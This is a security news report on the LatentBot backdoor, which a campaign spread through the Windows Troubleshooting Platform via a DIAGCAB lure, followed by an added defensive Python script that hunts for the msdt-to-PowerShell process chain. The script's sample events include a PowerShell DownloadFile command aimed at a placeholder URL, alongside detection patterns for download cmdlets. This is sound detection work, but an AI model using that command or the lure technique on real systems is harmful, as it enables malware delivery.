A highly obfuscated malicious backdoor that has been infecting organizations worldwide since 2013 was recently observed abusing the Windows Troubleshooting Platform (WTP) feature for distribution, Proofpoint researchers warn.
Dubbed “LatentBot”, the threat was discovered late last year and is a modular bot. The malware allows attackers to perform surveillance, information theft, and remote access operations. What’s more, the malware remained largely undetected for roughly two years before FireEye caught a glimpse of it. Last year, the malware successfully compromised companies in the U.S., U.K., South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland.
In a recent campaign, the malware was observed abusing WTP to trick victims into executing the malicious payload, which was being distributed via email attachments. Because launching a WTP troubleshooter is not accompanied by a security warning, and users are accustomed to running troubleshooters when Windows presents them, the attack becomes highly effective, Proofpoint researchers say.
In this campaign, email attachments were used to deliver a lure document, but Proofpoint argues that the same technique could be used with other delivery methods as well. As soon as the malicious document is opened, the victim is asked to “double-click to auto detect charset” and if they comply an embedded OLE object is launched.
Not only is the object a digitally signed DIAGCAB file (the Windows file extension for a troubleshooting pack), but it also presents the victim with another convincingly realistic window. This is a lure to trick the user into executing the scripts associated with the troubleshooting package, namely a PowerShell command that downloads and launches the malicious payload.
The security researchers explain that the attackers using such troubleshooting packages can customize the dialog’s appearance, actions, and scripts that it runs, via XML formatting. Because the malicious activity is performed outside the binary loading the .diagcab file, the malware execution method is highly effective at bypassing detection by many existing sandbox products.
“This continues the trend of malware authors seeking new sandbox evasion methods via COM-based non-standard execution flow; previous examples of these methods are WMI, Office Interoperability, Background Intelligent Transfer Service, and the Task Scheduler. In this instance, via the creation of an IScriptedDiagnosticHost COM object in msdt.exe, the DcomLaunch service starts the Scripted Diagnostics Host (sdiagnhost.exe) which will launch command shell and PowerShell commands,” Proofpoint researchers note.
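The execution chain described above (msdt.exe loading a .diagcab package, DcomLaunch starting sdiagnhost.exe, and sdiagnhost.exe spawning cmd.exe or PowerShell) leaves a distinctive parent-child pattern in process-creation telemetry. The following hunting script is an added example written for this article; it is not Proofpoint's or FireEye's code. It assumes Sysmon-style process-creation events with image, parent image and command line fields, and the sample events, paths and command lines it embeds are constructed placeholders shaped like the chain in the text.

```python
"""
Hunt for the Windows Troubleshooting Platform (WTP) execution chain in
process-creation telemetry. Added example, not code from the article.
Assumption: events carry image, parent image and command line (as Sysmon
Event ID 1 or most EDR process-start records do).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    cmdline: str


# Office hosts that would spawn msdt.exe when the embedded OLE object is
# double-clicked (assumed set; extend for your environment).
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the findings for one event (empty list if nothing matched)."""
    findings = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.cmdline.lower()
    # Stage 1: msdt.exe started by an Office process, or handed a .diagcab.
    if img == "msdt.exe" and parent in OFFICE_HOSTS:
        findings.append("msdt.exe launched from Office host")
    if img == "msdt.exe" and re.search(r"\.diagcab\b", cmd):
        findings.append("msdt.exe loading .diagcab package")
    # Stage 2: the Scripted Diagnostics Host spawning a shell. Built-in
    # troubleshooters also do this, so on its own it is a weak signal.
    if parent == "sdiagnhost.exe" and img in SHELLS:
        findings.append("sdiagnhost.exe spawned " + img)
        # A download cmdlet in that shell matches the download-and-launch
        # step described in the article and is the stronger indicator.
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", cmd):
            findings.append("download cmdlet in troubleshooter-spawned PowerShell")
    return findings


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Run classify() over a batch and keep only events with findings."""
    return {ev.pid: f for ev in events if (f := classify(ev))}


# Constructed sample events (not real telemetry); URL and file paths are
# placeholders, not indicators from the campaign.
SAMPLE = [
    ProcEvent(100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\explorer.exe", r'"WINWORD.EXE" /n "C:\Users\u\invoice.docx"'),
    ProcEvent(101, r"C:\Windows\System32\msdt.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"msdt.exe" /cab "C:\Users\u\AppData\Local\Temp\charset.diagcab"'),
    ProcEvent(102, r"C:\Windows\System32\sdiagnhost.exe",
              r"C:\Windows\System32\svchost.exe", '"sdiagnhost.exe" -Embedding'),
    ProcEvent(103, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\sdiagnhost.exe",
              "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile('<placeholder-url>', '<placeholder-path>')\""),
    # Benign look-alike: a built-in network troubleshooter running its script.
    ProcEvent(200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\sdiagnhost.exe",
              "powershell.exe -File TS_NetworkAdapter.ps1"),
    ProcEvent(300, r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for pid, findings in hunt(SAMPLE).items():
        print(pid, findings)
```

Run against the constructed batch, the script flags the msdt.exe launch from Word (two findings), the troubleshooter-spawned PowerShell with a download cmdlet (two findings), and, with a single weak finding, the benign troubleshooter event; that last case is why the Office-parent and download-cmdlet checks exist, so that a rule built from this does not page on every legitimate troubleshooter run.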
The LatentBot malware dropped as part of this campaign was observed loading a series of bot plugins for exfiltration and remote access, including Bot_Engine, remote_desktop_service, send_report, security, and vnc_hide_desktop.
Attackers have previously been seen abusing built-in Microsoft Windows features for a seamless, low-resistance infection process, and the use of WTP for nefarious purposes is a clear example of how they keep looking for new ways to achieve that. The natural “Windows” experience offered in this campaign was bound to fool even experienced users, not to mention that the unusual execution chain would bypass sandbox detection, researchers explain.
Last week, FireEye revealed that attackers have found new means to abuse Windows Management Instrumentation (WMI) queries to evade detection. WMI and PowerShell were seen being leveraged in various attacks by advanced persistent threat (APT) groups, and researchers have found new examples of how WMI queries can be leveraged for nefarious purposes.
